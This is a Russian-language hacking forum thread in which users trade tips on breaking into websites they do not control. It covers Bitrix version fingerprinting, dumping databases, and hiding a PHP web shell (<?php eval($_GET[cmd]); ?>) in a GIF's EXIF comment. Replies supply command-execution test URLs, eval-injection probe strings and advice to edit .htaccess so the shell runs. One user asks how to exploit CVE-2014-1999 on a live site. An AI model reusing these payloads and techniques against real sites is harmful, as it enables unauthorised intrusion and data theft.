здесь бывает нарисовано http://www.site.ru/bitrix/admin/index.php 1С-Битрикс: Управление сайтом 10.0.1. © 2002 Битрикс, 2007 1С-Битрикс или примерно можно определить по году релиза Битрикс: Управление сайтом. © 2002-2006 Битрикс или (в некоторых случаях) - http://www.site.ru/bitrix/updates/updater.log (только это в очень старых версиях - сейчас то и папки такой нет ) если есть доступ к админке - то в разделе обновления
Всем привет, возможно я покажусь клоуном, но хотелось бы услышать ответ от опытных юзеров. С чего начать свой путь? Да я могу сливать бд через sql dumper, но хочется развиваться, я уверен есть много тем на форуме, чтобы начать с азов. К примеру тему о заливке шелла и прочее, то есть именно где можно почитать и вникнуть, заранее спасибо
Помогите плз, есть сайт на нем я думаю есть софт. Нужна ссылка на софт, есть два сайта, один , на втором есть зипы, но не тот софт что нужен. Нужен ause, помогите плз
Если ты ищешь на сайте ausee.ru/main, то его там нету, там ведут ссылки на 2 сайт, I-tt.ru hxxp://ausee.ru/url/hxxp://www.i-tt.ru/soft/ause.html А по ссылки hxxp://www.i-tt.ru/soft/ause.html Часто задаваемые вопросы по роботу AuSe есть ссылка hxxp://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf И в завершении качай Code: hxxp://www.i-tt.ru/soft/AuSe/AuSe.zip
Спс!! Я люблю тебя Вот не поверишь смотрел я в этой папке файл, затупил и все мелкими буквами написал..
Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии PHP: <?php eval($_GET[cmd]); ?> Теперь вопрос, как залить нормальный шелл? phpinfo при помощи запроса http://site.com/shell-image.gif?cmd=phpinfo(); не показывается Попробовал на своем хостинге промутить, тоже ничего не получилось.
Пожалуйста, попробуйте сделать так http://site.com/shell-image.gif?cmd=ls or http://site.com/shell-image.gif?cmd=whoami если ничего не выполняется возможно вы забыли про Эйчтиассес
Так посмотрите , вы картинку залили , возможно с кодом, но она обрабатывается как картинка, код не обрабатывается
Помогите разобраться. Просканировал сайт сканером w3af-ом он выдал следующее: Code: eval() input injection was found at: "http://site.com/index.php", using HTTP method POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified parameter was "do". This vulnerability was found in the requests with ids 10511, 10569, 10651, 10734 and 10837. eval() input injection was found at: "http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using HTTP method POST. The sent post-data was: "...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRleC5waHA/YXBwPWNvcmU..." which modifies the "usedInJsLater" parameter. This vulnerability was found in the requests with ids 10510, 10580, 10654, 10760 and 10873. Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.
может что то такое проканает do=echo "test";exit;// do=;echo "test";exit;// do= && echo "test";exit;// etc в урл энкод только надо обернуть phpinfo в редких случаях может быть например отключена
ну если бы гифки выполнялись как пхп это было бы ммм ^_^ как проверить выполняется код или нет? скачай свою гифку с сайта, открой в блокноте, видишь пхп код? если да значит он стопудово не выполнился, если не видишь - значит он либо выполнился, либо порезался на этапе загрузки по дефолту конечно он выполнятся не будет, вообще в большинстве случаев запрос даже не дойдет до апача->пыхи, картинку отдаст nginx( который сейчас используется почти везде ) даже если запрос дойдет таки до апача, оный должен понять как обработать файл, для это есть хендлеры, в манах есть примеры https://httpd.apache.org/docs/2.2/ru/handler.html как правильно сказал BabaDook нужно подредактировать .htaccess, добавив хендлер для своего шелла
Подскажите по движку typo3 (версия TYPO3 4.5 CMS). В базе есть таблицы be_users и fe_users, но логины и пароли к админке (cайт/typo3/index.php) не подходят. Кто знаком с typo3 подскажите!
Есть сайт на немного странном php фреймворке fuelPHP. Сайт онлайн, доступа нету. Нашел такие уязвимости http://fuelphp.com/security-advisories и http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1999. Звучит так "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response." Как проверить имеет ли сайт уязвимость (актуальна ли версия фреймворка). Где можно почитать про эксплуатацию подобного рода уязвимостей?
Для эксплуатации уязвимости нужно знать пхп. Если ты его не знаешь или не имеешь опыта создания сайтов на пхп то использовать уязвимость не получится. Если знаешь то нужно скачать уязвимую верси fuelphp, открыть исходники, на локалхосте изучить уязвимость и опробовать её. Дальше имея опыт эксплуатации уязвимости в лабораторных условиях можешь сделать попытку эксплуатации на рабочем сайте. И если будет успех то вообще можешь эксплоит для этой уязвимости сделать и будешь крут.
PHP знаю, но с данным фреймворком не работал. Вот времени правда мало. Можно ли узнать версию фреймворка? Что можно почитать по теме?